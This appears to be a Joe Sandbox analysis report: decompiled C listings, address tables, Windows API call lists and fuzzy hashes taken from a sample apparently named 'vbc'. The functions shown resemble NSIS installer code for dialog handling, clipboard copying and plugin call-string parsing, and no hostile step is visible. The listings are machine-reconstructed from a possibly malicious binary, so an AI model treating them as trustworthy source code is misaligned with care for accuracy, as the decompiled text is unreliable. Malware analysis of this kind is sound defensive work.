                                                								} while (_t156 < _a8);
                                                								GlobalUnlock(_a4);
                                                								SetClipboardData(0xd, _a4);
                                                								CloseClipboard();
                                                							}
                                                							goto L36;
                                                						}
                                                						if( *0x433ecc == _t156) {
                                                							ShowWindow( *0x434f08, 8);
                                                							if( *0x434f8c == _t156) {
                                                								_t119 =  *0x42c240; // 0x5d51a4
                                                								E0040559F( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                							}
                                                							E00404472(_t171);
                                                							goto L25;
                                                						}
                                                						 *0x42ba38 = 2;
                                                						E00404472(0x78);
                                                						goto L20;
                                                					} else {
                                                						if(_a12 != 0x403) {
                                                							L20:
                                                							return E00404500(_a8, _a12, _a16);
                                                						}
                                                						ShowWindow( *0x433ed0, _t156);
                                                						ShowWindow(_t169, 8);
                                                						E004044CE(_t169);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v52 = _v52 | 0xffffffff;
                                                				_v40 = _v40 | 0xffffffff;
                                                				_t177 = 2;
                                                				_v60 = _t177;
                                                				_v56 = 0;
                                                				_v48 = 0;
                                                				_v44 = 0;
                                                				asm("stosd");
                                                				asm("stosd");
                                                				_t130 =  *0x434f10;
                                                				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                				 *0x433ed0 = GetDlgItem(_a4, 0x403);
                                                				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
                                                				_t134 = GetDlgItem(_a4, 0x3f8);
                                                				 *0x433ee4 = _t134;
                                                				_v8 = _t134;
                                                				E004044CE( *0x433ed0);
                                                				 *0x433ed4 = E00404E27(4);
                                                				 *0x433eec = 0;
                                                				GetClientRect(_v8,  &_v28);
                                                				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                				if(_a8 >= 0) {
                                                					SendMessageW(_v8, 0x1001, 0, _a8);
                                                					SendMessageW(_v8, 0x1026, 0, _a8);
                                                				}
                                                				if(_a12 >= _t156) {
                                                					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                				}
                                                				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                				_push(0x1b);
                                                				E00404499(_a4);
                                                				if(( *0x434f18 & 0x00000003) != 0) {
                                                					ShowWindow( *0x433ed0, _t156);
                                                					if(( *0x434f18 & 0x00000002) != 0) {
                                                						 *0x433ed0 = _t156;
                                                					} else {
                                                						ShowWindow(_v8, 8);
                                                					}
                                                					E004044CE( *0x433ec8);
                                                				}
                                                				_t168 = GetDlgItem(_a4, 0x3ec);
                                                				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                				if(( *0x434f18 & 0x00000004) != 0) {
                                                					SendMessageW(_t168, 0x409, _t156, _a12);
                                                					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                				}
                                                				goto L36;
                                                			}



































                                                0x004056e6
                                                0x004056ec
                                                0x004056f6
                                                0x004056f9
                                                0x0040588f
                                                0x004058ac
                                                0x004058b3
                                                0x004058b3
                                                0x004058c6
                                                0x004058e4
                                                0x004058e6
                                                0x004058ee
                                                0x00405944
                                                0x00405948
                                                0x00000000
                                                0x00000000
                                                0x0040594a
                                                0x00405950
                                                0x00000000
                                                0x00000000
                                                0x0040595a
                                                0x00405962
                                                0x00405965
                                                0x00405a67
                                                0x00000000
                                                0x00405a67
                                                0x00405974
                                                0x0040597f
                                                0x00405988
                                                0x00405993
                                                0x00405996
                                                0x0040599f
                                                0x004059a5
                                                0x004059a8
                                                0x004059a8
                                                0x004059c0
                                                0x004059c9
                                                0x004059cc
                                                0x004059d3
                                                0x004059da
                                                0x004059e2
                                                0x004059e2
                                                0x004059f9
                                                0x004059f9
                                                0x00405a00
                                                0x00405a06
                                                0x00405a12
                                                0x00405a19
                                                0x00405a22
                                                0x00405a24
                                                0x00405a27
                                                0x00405a36
                                                0x00405a39
                                                0x00405a3f
                                                0x00405a40
                                                0x00405a46
                                                0x00405a47
                                                0x00405a48
                                                0x00405a50
                                                0x00405a5b
                                                0x00405a61
                                                0x00405a61
                                                0x00000000
                                                0x004059c0
                                                0x004058f6
                                                0x00405926
                                                0x0040592e
                                                0x00405930
                                                0x00405939
                                                0x00405939
                                                0x0040593f
                                                0x00000000
                                                0x0040593f
                                                0x004058fa
                                                0x00405904
                                                0x00000000
                                                0x004058c8
                                                0x004058ce
                                                0x00405909
                                                0x00000000
                                                0x00405912
                                                0x004058d7
                                                0x004058dc
                                                0x004058df
                                                0x00000000
                                                0x004058df
                                                0x004058c6
                                                0x004056ff
                                                0x00405703
                                                0x0040570b
                                                0x0040570f
                                                0x00405712
                                                0x00405715
                                                0x00405718
                                                0x0040571b
                                                0x0040571c
                                                0x0040571d
                                                0x00405736
                                                0x00405739
                                                0x00405743
                                                0x00405752
                                                0x0040575a
                                                0x00405762
                                                0x00405767
                                                0x0040576a
                                                0x00405776
                                                0x0040577f
                                                0x00405788
                                                0x004057aa
                                                0x004057b0
                                                0x004057c1
                                                0x004057c6
                                                0x004057d4
                                                0x004057e2
                                                0x004057e2
                                                0x004057e7
                                                0x004057f5
                                                0x004057f5
                                                0x004057fa
                                                0x004057fd
                                                0x00405802
                                                0x0040580e
                                                0x00405817
                                                0x00405824
                                                0x00405833
                                                0x00405826
                                                0x0040582b
                                                0x0040582b
                                                0x0040583f
                                                0x0040583f
                                                0x00405853
                                                0x0040585c
                                                0x00405865
                                                0x00405875
                                                0x00405881
                                                0x00405881
                                                0x00000000

                                                APIs
                                                • GetDlgItem.USER32(?,00000403), ref: 0040573C
                                                • GetDlgItem.USER32(?,000003EE), ref: 0040574B
                                                • GetClientRect.USER32 ref: 00405788
                                                • GetSystemMetrics.USER32 ref: 0040578F
                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B0
                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C1
                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D4
                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E2
                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057F5
                                                • ShowWindow.USER32(00000000,?), ref: 00405817
                                                • ShowWindow.USER32(?,00000008), ref: 0040582B
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040584C
                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040585C
                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405875
                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405881
                                                • GetDlgItem.USER32(?,000003F8), ref: 0040575A
                                                  • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                • GetDlgItem.USER32(?,000003EC), ref: 0040589E
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005672,00000000), ref: 004058AC
                                                • CloseHandle.KERNELBASE(00000000), ref: 004058B3
                                                • ShowWindow.USER32(00000000), ref: 004058D7
                                                • ShowWindow.USER32(?,00000008), ref: 004058DC
                                                • ShowWindow.USER32(00000008), ref: 00405926
                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595A
                                                • CreatePopupMenu.USER32 ref: 0040596B
                                                • AppendMenuW.USER32 ref: 0040597F
                                                • GetWindowRect.USER32 ref: 0040599F
                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059B8
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F0
                                                • OpenClipboard.USER32(00000000), ref: 00405A00
                                                • EmptyClipboard.USER32 ref: 00405A06
                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A12
                                                • GlobalLock.KERNEL32 ref: 00405A1C
                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A30
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405A50
                                                • SetClipboardData.USER32 ref: 00405A5B
                                                • CloseClipboard.USER32 ref: 00405A61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.679876025.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.679871422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679883945.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679887439.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679933543.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679937425.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679941913.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.679946315.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                • String ID: {
                                                • API String ID: 590372296-366298937
                                                • Opcode ID: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                                                • Opcode Fuzzy Hash: efbbf4d88f7660e4c87201c03f03245d3270aa31951a4a241d93bb0c475bbbe6
                                                • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E73191BFF() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				WCHAR* _v24;
                                                				WCHAR* _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				WCHAR* _v48;
                                                				signed int _v52;
                                                				void* _v56;
                                                				intOrPtr _v60;
                                                				WCHAR* _t208;
                                                				signed int _t211;
                                                				void* _t213;
                                                				void* _t215;
                                                				WCHAR* _t217;
                                                				void* _t225;
                                                				struct HINSTANCE__* _t226;
                                                				struct HINSTANCE__* _t227;
                                                				struct HINSTANCE__* _t229;
                                                				signed short _t231;
                                                				struct HINSTANCE__* _t234;
                                                				struct HINSTANCE__* _t236;
                                                				void* _t237;
                                                				intOrPtr* _t238;
                                                				void* _t249;
                                                				signed char _t250;
                                                				signed int _t251;
                                                				void* _t255;
                                                				struct HINSTANCE__* _t257;
                                                				void* _t258;
                                                				signed int _t260;
                                                				signed int _t261;
                                                				signed short* _t264;
                                                				signed int _t269;
                                                				signed int _t272;
                                                				signed int _t274;
                                                				void* _t277;
                                                				void* _t281;
                                                				struct HINSTANCE__* _t283;
                                                				signed int _t286;
                                                				void _t287;
                                                				signed int _t288;
                                                				signed int _t300;
                                                				signed int _t301;
                                                				signed short _t304;
                                                				void* _t305;
                                                				signed int _t309;
                                                				signed int _t312;
                                                				signed int _t315;
                                                				signed int _t316;
                                                				signed int _t317;
                                                				signed short* _t321;
                                                				WCHAR* _t322;
                                                				WCHAR* _t324;
                                                				WCHAR* _t325;
                                                				struct HINSTANCE__* _t326;
                                                				void* _t328;
                                                				signed int _t331;
                                                				void* _t332;
                                                
                                                				_t283 = 0;
                                                				_v32 = 0;
                                                				_v36 = 0;
                                                				_v16 = 0;
                                                				_v8 = 0;
                                                				_v40 = 0;
                                                				_t332 = 0;
                                                				_v52 = 0;
                                                				_v44 = 0;
                                                				_t208 = E731912BB();
                                                				_v24 = _t208;
                                                				_v28 = _t208;
                                                				_v48 = E731912BB();
                                                				_t321 = E731912E3();
                                                				_v56 = _t321;
                                                				_v12 = _t321;
                                                				while(1) {
                                                					_t211 = _v32;
                                                					_v60 = _t211;
                                                					if(_t211 != _t283 && _t332 == _t283) {
                                                						break;
                                                					}
                                                					_t286 =  *_t321 & 0x0000ffff;
                                                					_t213 = _t286 - _t283;
                                                					if(_t213 == 0) {
                                                						_t37 =  &_v32;
                                                						 *_t37 = _v32 | 0xffffffff;
                                                						__eflags =  *_t37;
                                                						L20:
                                                						_t215 = _v60 - _t283;
                                                						if(_t215 == 0) {
                                                							__eflags = _t332 - _t283;
                                                							 *_v28 = _t283;
                                                							if(_t332 == _t283) {
                                                								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                                                								_t332 = _t255;
                                                								 *(_t332 + 0x1010) = _t283;
                                                								 *(_t332 + 0x1014) = _t283;
                                                							}
                                                							_t287 = _v36;
                                                							_t47 = _t332 + 8; // 0x8
                                                							_t217 = _t47;
                                                							_t48 = _t332 + 0x808; // 0x808
                                                							_t322 = _t48;
                                                							 *_t332 = _t287;
                                                							_t288 = _t287 - _t283;
                                                							__eflags = _t288;
                                                							 *_t217 = _t283;
                                                							 *_t322 = _t283;
                                                							 *(_t332 + 0x1008) = _t283;
                                                							 *(_t332 + 0x100c) = _t283;
                                                							 *(_t332 + 4) = _t283;
                                                							if(_t288 == 0) {
                                                								__eflags = _v28 - _v24;
                                                								if(_v28 == _v24) {
                                                									goto L42;
                                                								}
                                                								_t328 = 0;
                                                								GlobalFree(_t332);
                                                								_t332 = E731913B1(_v24);
                                                								__eflags = _t332 - _t283;
                                                								if(_t332 == _t283) {
                                                									goto L42;
                                                								} else {
                                                									goto L35;
                                                								}
                                                								while(1) {
                                                									L35:
                                                									_t249 =  *(_t332 + 0x1ca0);
                                                									__eflags = _t249 - _t283;
                                                									if(_t249 == _t283) {
                                                										break;
                                                									}
                                                									_t328 = _t332;
                                                									_t332 = _t249;
                                                									__eflags = _t332 - _t283;
                                                									if(_t332 != _t283) {
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								__eflags = _t328 - _t283;
                                                								if(_t328 != _t283) {
                                                									 *(_t328 + 0x1ca0) = _t283;
                                                								}
                                                								_t250 =  *(_t332 + 0x1010);
                                                								__eflags = _t250 & 0x00000008;
                                                								if((_t250 & 0x00000008) == 0) {
                                                									_t251 = _t250 | 0x00000002;
                                                									__eflags = _t251;
                                                									 *(_t332 + 0x1010) = _t251;
                                                								} else {
                                                									_t332 = E7319162F(_t332);
                                                									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                								}
                                                								goto L42;
                                                							} else {
                                                								_t300 = _t288 - 1;
                                                								__eflags = _t300;
                                                								if(_t300 == 0) {
                                                									L31:
                                                									lstrcpyW(_t217, _v48);
                                                									L32:
                                                									lstrcpyW(_t322, _v24);
                                                									goto L42;
                                                								}
                                                								_t301 = _t300 - 1;
                                                								__eflags = _t301;
                                                								if(_t301 == 0) {
                                                									goto L32;
                                                								}
                                                								__eflags = _t301 != 1;
                                                								if(_t301 != 1) {
                                                									goto L42;
                                                								}
                                                								goto L31;
                                                							}
                                                						} else {
                                                							if(_t215 == 1) {
                                                								_t257 = _v16;
                                                								if(_v40 == _t283) {
                                                									_t257 = _t257 - 1;
                                                								}
                                                								 *(_t332 + 0x1014) = _t257;
                                                							}
                                                							L42:
                                                							_v12 = _v12 + 2;
                                                							_v28 = _v24;
                                                							L59:
                                                							if(_v32 != 0xffffffff) {
                                                								_t321 = _v12;
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                					}
                                                					_t258 = _t213 - 0x23;
                                                					if(_t258 == 0) {
                                                						__eflags = _t321 - _v56;
                                                						if(_t321 <= _v56) {
                                                							L17:
                                                							__eflags = _v44 - _t283;
                                                							if(_v44 != _t283) {
                                                								L43:
                                                								_t260 = _v32 - _t283;
                                                								__eflags = _t260;
                                                								if(_t260 == 0) {
                                                									_t261 = _t286;
                                                									while(1) {
                                                										__eflags = _t261 - 0x22;
                                                										if(_t261 != 0x22) {
                                                											break;
                                                										}
                                                										_t321 =  &(_t321[1]);
                                                										__eflags = _v44 - _t283;
                                                										_v12 = _t321;
                                                										if(_v44 == _t283) {
                                                											_v44 = 1;
                                                											L162:
                                                											_v28 =  &(_v28[0]);
                                                											 *_v28 =  *_t321;
                                                											L58:
                                                											_t331 =  &(_t321[1]);
                                                											__eflags = _t331;
                                                											_v12 = _t331;
                                                											goto L59;
                                                										}
                                                										_t261 =  *_t321 & 0x0000ffff;
                                                										_v44 = _t283;
                                                									}
                                                									__eflags = _t261 - 0x2a;
                                                									if(_t261 == 0x2a) {
                                                										_v36 = 2;
                                                										L57:
                                                										_t321 = _v12;
                                                										_v28 = _v24;
                                                										_t283 = 0;
                                                										__eflags = 0;
                                                										goto L58;
                                                									}
                                                									__eflags = _t261 - 0x2d;
                                                									if(_t261 == 0x2d) {
                                                										L151:
                                                										_t304 =  *_t321;
                                                										__eflags = _t304 - 0x2d;
                                                										if(_t304 != 0x2d) {
                                                											L154:
                                                											_t264 =  &(_t321[1]);
                                                											__eflags =  *_t264 - 0x3a;
                                                											if( *_t264 != 0x3a) {
                                                												goto L162;
                                                											}
                                                											__eflags = _t304 - 0x2d;
                                                											if(_t304 == 0x2d) {
                                                												goto L162;
                                                											}
                                                											_v36 = 1;
                                                											L157:
                                                											_v12 = _t264;
                                                											__eflags = _v28 - _v24;
                                                											if(_v28 <= _v24) {
                                                												 *_v48 = _t283;
                                                											} else {
                                                												 *_v28 = _t283;
                                                												lstrcpyW(_v48, _v24);
                                                											}
                                                											goto L57;
                                                										}
                                                										_t264 =  &(_t321[1]);
                                                										__eflags =  *_t264 - 0x3e;
                                                										if( *_t264 != 0x3e) {
                                                											goto L154;
                                                										}
                                                										_v36 = 3;
                                                										goto L157;
                                                									}
                                                									__eflags = _t261 - 0x3a;
                                                									if(_t261 != 0x3a) {
                                                										goto L162;
                                                									}
                                                									goto L151;
                                                								}
                                                								_t269 = _t260 - 1;
                                                								__eflags = _t269;
                                                								if(_t269 == 0) {
                                                									L80:
                                                									_t305 = _t286 + 0xffffffde;
                                                									__eflags = _t305 - 0x55;
                                                									if(_t305 > 0x55) {
                                                										goto L57;
                                                									}
                                                									switch( *((intOrPtr*)(( *(_t305 + 0x731923e8) & 0x000000ff) * 4 +  &M7319235C))) {
                                                										case 0:
                                                											__ecx = _v24;
                                                											__edi = _v12;
                                                											while(1) {
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__ax =  *__edi;
                                                												__eflags = __ax - __dx;
                                                												if(__ax != __dx) {
                                                													goto L132;
                                                												}
                                                												L131:
                                                												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                													L136:
                                                													 *__ecx =  *__ecx & 0x00000000;
                                                													__eax = E731912CC(_v24);
                                                													__ebx = __eax;
                                                													goto L97;
                                                												}
                                                												L132:
                                                												__eflags = __ax;
                                                												if(__ax == 0) {
                                                													goto L136;
                                                												}
                                                												__eflags = __ax - __dx;
                                                												if(__ax == __dx) {
                                                													__edi = __edi + 1;
                                                													__edi = __edi + 1;
                                                													__eflags = __edi;
                                                												}
                                                												__ax =  *__edi;
                                                												 *__ecx =  *__edi;
                                                												__ecx = __ecx + 1;
                                                												__ecx = __ecx + 1;
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__ax =  *__edi;
                                                												__eflags = __ax - __dx;
                                                												if(__ax != __dx) {
                                                													goto L132;
                                                												}
                                                												goto L131;
                                                											}
                                                										case 1:
                                                											_v8 = 1;
                                                											goto L57;
                                                										case 2:
                                                											_v8 = _v8 | 0xffffffff;
                                                											goto L57;
                                                										case 3:
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v16 = _v16 + 1;
                                                											goto L85;
                                                										case 4:
                                                											__eflags = _v20;
                                                											if(_v20 != 0) {
                                                												goto L57;
                                                											}
                                                											_v12 = _v12 - 2;
                                                											__ebx = E731912BB();
                                                											 &_v12 = E73191B86( &_v12);
                                                											__eax = E73191510(__edx, __eax, __edx, __ebx);
                                                											goto L97;
                                                										case 5:
                                                											L105:
                                                											_v20 = _v20 + 1;
                                                											goto L57;
                                                										case 6:
                                                											_push(7);
                                                											goto L123;
                                                										case 7:
                                                											_push(0x19);
                                                											goto L143;
                                                										case 8:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L107;
                                                										case 9:
                                                											_push(0x15);
                                                											goto L143;
                                                										case 0xa:
                                                											_push(0x16);
                                                											goto L143;
                                                										case 0xb:
                                                											_push(0x18);
                                                											goto L143;
                                                										case 0xc:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L118;
                                                										case 0xd:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L109;
                                                										case 0xe:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L111;
                                                										case 0xf:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L122;
                                                										case 0x10:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L113;
                                                										case 0x11:
                                                											_push(3);
                                                											goto L123;
                                                										case 0x12:
                                                											_push(0x17);
                                                											L143:
                                                											_pop(__ebx);
                                                											goto L98;
                                                										case 0x13:
                                                											__eax =  &_v12;
                                                											__eax = E73191B86( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											__eflags = __ebx - 0xb;
                                                											if(__ebx < 0xb) {
                                                												__ebx = __ebx + 0xa;
                                                											}
                                                											goto L97;
                                                										case 0x14:
                                                											__ebx = 0xffffffff;
                                                											goto L98;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L116;
                                                										case 0x16:
                                                											__ecx = 0;
                                                											__eflags = 0;
                                                											goto L91;
                                                										case 0x17:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L120;
                                                										case 0x18:
                                                											_t271 =  *(_t332 + 0x1014);
                                                											__eflags = _t271 - _v16;
                                                											if(_t271 > _v16) {
                                                												_v16 = _t271;
                                                											}
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v36 - 3 = _t271 - (_v36 == 3);
                                                											if(_t271 != _v36 == 3) {
                                                												L85:
                                                												_v40 = 1;
                                                											}
                                                											goto L57;
                                                										case 0x19:
                                                											L107:
                                                											__ecx = 0;
                                                											_v8 = 2;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1a:
                                                											L118:
                                                											_push(5);
                                                											goto L123;
                                                										case 0x1b:
                                                											L109:
                                                											__ecx = 0;
                                                											_v8 = 3;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1c:
                                                											L111:
                                                											__ecx = 0;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1d:
                                                											L122:
                                                											_push(6);
                                                											goto L123;
                                                										case 0x1e:
                                                											L113:
                                                											_push(2);
                                                											goto L123;
                                                										case 0x1f:
                                                											__eax =  &_v12;
                                                											__eax = E73191B86( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											goto L97;
                                                										case 0x20:
                                                											L116:
                                                											_v52 = _v52 + 1;
                                                											_push(4);
                                                											_pop(__ecx);
                                                											goto L91;
                                                										case 0x21:
                                                											L120:
                                                											_push(4);
                                                											L123:
                                                											_pop(__ecx);
                                                											L91:
                                                											__edi = _v16;
                                                											__edx =  *(0x7319405c + __ecx * 4);
                                                											__eax =  ~__eax;
                                                											asm("sbb eax, eax");
                                                											_v40 = 1;
                                                											__edi = _v16 << 5;
                                                											__eax = __eax & 0x00008000;
                                                											__edi = (_v16 << 5) + __esi;
                                                											__eax = __eax | __ecx;
                                                											__eflags = _v8;
                                                											 *(__edi + 0x1018) = __eax;
                                                											if(_v8 < 0) {
                                                												L93:
                                                												__edx = 0;
                                                												__edx = 1;
                                                												__eflags = 1;
                                                												L94:
                                                												__eflags = _v8 - 1;
                                                												 *(__edi + 0x1028) = __edx;
                                                												if(_v8 == 1) {
                                                													__eax =  &_v12;
                                                													__eax = E73191B86( &_v12);
                                                													__eax = __eax + 1;
                                                													__eflags = __eax;
                                                													_v8 = __eax;
                                                												}
                                                												__eax = _v8;
                                                												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                												_t136 = _v16 + 0x81; // 0x81
                                                												_t136 = _t136 << 5;
                                                												__eax = 0;
                                                												__eflags = 0;
                                                												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                												L97:
                                                												__eflags = __ebx;
                                                												if(__ebx == 0) {
                                                													goto L57;
                                                												}
                                                												L98:
                                                												__eflags = _v20;
                                                												_v40 = 1;
                                                												if(_v20 != 0) {
                                                													L103:
                                                													__eflags = _v20 - 1;
                                                													if(_v20 == 1) {
                                                														__eax = _v16;
                                                														__eax = _v16 << 5;
                                                														__eflags = __eax;
                                                														 *(__eax + __esi + 0x102c) = __ebx;
                                                													}
                                                													goto L105;
                                                												}
                                                												_v16 = _v16 << 5;
                                                												_t144 = __esi + 0x1030; // 0x1030
                                                												__edi = (_v16 << 5) + _t144;
                                                												__eax =  *__edi;
                                                												__eflags = __eax - 0xffffffff;
                                                												if(__eax <= 0xffffffff) {
                                                													L101:
                                                													__eax = GlobalFree(__eax);
                                                													L102:
                                                													 *__edi = __ebx;
                                                													goto L103;
                                                												}
                                                												__eflags = __eax - 0x19;
                                                												if(__eax <= 0x19) {
                                                													goto L102;
                                                												}
                                                												goto L101;
                                                											}
                                                											__eflags = __edx;
                                                											if(__edx > 0) {
                                                												goto L94;
                                                											}
                                                											goto L93;
                                                										case 0x22:
                                                											goto L57;
                                                									}
                                                								}
                                                								_t272 = _t269 - 1;
                                                								__eflags = _t272;
                                                								if(_t272 == 0) {
                                                									_v16 = _t283;
                                                									goto L80;
                                                								}
                                                								__eflags = _t272 != 1;
                                                								if(_t272 != 1) {
                                                									goto L162;
                                                								}
                                                								__eflags = _t286 - 0x6e;
                                                								if(__eflags > 0) {
                                                									_t309 = _t286 - 0x72;
                                                									__eflags = _t309;
                                                									if(_t309 == 0) {
                                                										_push(4);
                                                										L74:
                                                										_pop(_t274);
                                                										L75:
                                                										__eflags = _v8 - 1;
                                                										if(_v8 != 1) {
                                                											_t96 = _t332 + 0x1010;
                                                											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                											__eflags =  *_t96;
                                                										} else {
                                                											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                										}
                                                										_v8 = 1;
                                                										goto L57;
                                                									}
                                                									_t312 = _t309 - 1;
                                                									__eflags = _t312;
                                                									if(_t312 == 0) {
                                                										_push(0x10);
                                                										goto L74;
                                                									}
                                                									__eflags = _t312 != 0;
                                                									if(_t312 != 0) {
                                                										goto L57;
                                                									}
                                                									_push(0x40);
                                                									goto L74;
                                                								}
                                                								if(__eflags == 0) {
                                                									_push(8);
                                                									goto L74;
                                                								}
                                                								_t315 = _t286 - 0x21;
                                                								__eflags = _t315;
                                                								if(_t315 == 0) {
                                                									_v8 =  ~_v8;
                                                									goto L57;
                                                								}
                                                								_t316 = _t315 - 0x11;
                                                								__eflags = _t316;
                                                								if(_t316 == 0) {
                                                									_t274 = 0x100;
                                                									goto L75;
                                                								}
                                                								_t317 = _t316 - 0x31;
                                                								__eflags = _t317;
                                                								if(_t317 == 0) {
                                                									_t274 = 1;
                                                									goto L75;
                                                								}
                                                								__eflags = _t317 != 0;
                                                								if(_t317 != 0) {
                                                									goto L57;
                                                								}
                                                								_push(0x20);
                                                								goto L74;
                                                							} else {
                                                								_v32 = _t283;
                                                								_v36 = _t283;
                                                								goto L20;
                                                							}
                                                						}
                                                						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                							goto L17;
                                                						}
                                                						__eflags = _v32 - _t283;
                                                						if(_v32 == _t283) {
                                                							goto L43;
                                                						}
                                                						goto L17;
                                                					}
                                                					_t277 = _t258 - 5;
                                                					if(_t277 == 0) {
                                                						__eflags = _v44 - _t283;
                                                						if(_v44 != _t283) {
                                                							goto L43;
                                                						} else {
                                                							__eflags = _v36 - 3;
                                                							_v32 = 1;
                                                							_v8 = _t283;
                                                							_v20 = _t283;
                                                							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                							_v40 = _t283;
                                                							goto L20;
                                                						}
                                                					}
                                                					_t281 = _t277 - 1;
                                                					if(_t281 == 0) {
                                                						__eflags = _v44 - _t283;
                                                						if(_v44 != _t283) {
                                                							goto L43;
                                                						} else {
                                                							_v32 = 2;
                                                							_v8 = _t283;
                                                							_v20 = _t283;
                                                							goto L20;
                                                						}
                                                					}
                                                					if(_t281 != 0x16) {
                                                						goto L43;
                                                					} else {
                                                						_v32 = 3;
                                                						_v8 = 1;
                                                						goto L20;
                                                					}
                                                				}
                                                				GlobalFree(_v56);
                                                				GlobalFree(_v24);
                                                				GlobalFree(_v48);
                                                				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                					L182:
                                                					return _t332;
                                                				} else {
                                                					_t225 =  *_t332 - 1;
                                                					if(_t225 == 0) {
                                                						_t187 = _t332 + 8; // 0x8
                                                						_t324 = _t187;
                                                						__eflags =  *_t324 - _t283;
                                                						if( *_t324 != _t283) {
                                                							_t226 = GetModuleHandleW(_t324);
                                                							__eflags = _t226 - _t283;
